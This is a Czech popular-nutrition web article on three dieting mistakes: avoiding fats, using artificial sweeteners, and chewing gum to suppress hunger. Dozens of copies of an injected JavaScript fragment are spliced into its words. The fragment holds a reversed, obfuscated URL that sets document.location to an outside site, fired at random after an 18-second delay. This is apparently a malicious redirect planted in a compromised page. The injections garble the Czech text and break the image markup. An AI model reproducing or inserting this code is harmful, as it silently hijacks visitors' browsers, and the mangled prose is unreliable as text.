Výživa

3 DIETNÍ CHYBY, KTERÉ BRZDÍ VAŠE POKROKY

Kdo z vás má pocit, že dává do sestavení a udržení jídelníčku maximum, a přestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nejde všechno podle vašich představ? Neblokuje váš progres některá z těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to skrytých, a přitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom tak zrádných chyb?

 

  1. MÁTE HRŮZU Z TUKŮ

Drastická eliminace tuků ze stravy může být překvapivě kontraproduktivní. Nedostatek vhodných tuků tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž škodí víc, než si možná umíte představit.

V čem nám zdravé tuky prospívají?tobor-latigid//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-4-300×200.jpg“ alt=““ width=“300″ height=“200″ />

  • mají protizánětlivé účinky;
  • posilují imunitu;
  • snižují riziko vzniku onemocnění srdce;
  • zvyšují výkonnost;
  • urychlují regeneraci.

Samozřejmě nejsou tuky jako tuky, ale těm polynenasyceným, známým také jako omega-3, byste se vyhýbat neměli. Protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dává smysl zařazovat do jídelníčku pravidelně tučné ryby (tuňák, losos atd.), případně přidat kvalitní omega-3 suplement. Rybí olej tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž mimo jiné podporuje proteosyntézu, tzn. podpoří vaši snahu u budování svalové hmoty. A čím více máte svalů, tím více tělo spotřebovává kalorií, tedy tím snáze spaluje tukové rezervy.

 

Kvalitní tuky by měly tvořit 20-30 % vašeho denního kalorického příjmu. Kromě ryb konzumujte také avokádo, olivový olej a ořechy + semínka.

 

  1. NAHRAZUJETE CUKRY UMĚLÝMI SLADIDLY

 

Umělá sladidla mají v posledních letech neuvěřitelnou marketingovou podporu. Než se ale rozhodnete potlačit chuť na sladké dietní limonádou či jiným produktem s náhražkou cukru, měli byste vědět, že dost možná kýženého efektu nedosáhnete.

Nejedna odborná studie tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž ukázala, že nekalorická umělá sladidla neuspokojí centrum chutí v mozku, ba dokonce mohou tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}touhu po sladkém navýšit. Jaké vás čekají následky, asi netřeba zdůrazňovat.

 

Potravinám a nápojům s obsahem umělých sladidel se vyhýbejte. Nepoužívejte je ve snaze uspokojit svou chuť na sladké. Mozek se tak snadno podvést nenechá.

 

  1. MEZI JÍDLY ŽVÝKÁTE ŽVÝKAČKU, ABYSTE POTLAČILI HLADtobor-latigid//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-5-300×199.jpg“ alt=““ width=“300″ height=“199″ />

Dříve tak propagovaný trik, abyste hlad potlačili pomocí žvýkačky, je podle odborníků mýtus. Hned několik studií tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž prokázalo, že díky žvýkačce možná nebudete tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolik hřešit mezi jídly, ale jste vystaveni většímu riziku zvýšeného kalorického příjmu. Jednoduše řečeno – hrozí, že tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho pak sníte víc, než kdybyste před tím nežvýkali.

 

Místobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to žvýkačky si dejte šálek zeleného čaje. Ten nejenom podpoří pocit nasycení, ale obsahuje také látky schopné stimulovat odbourávání tuků.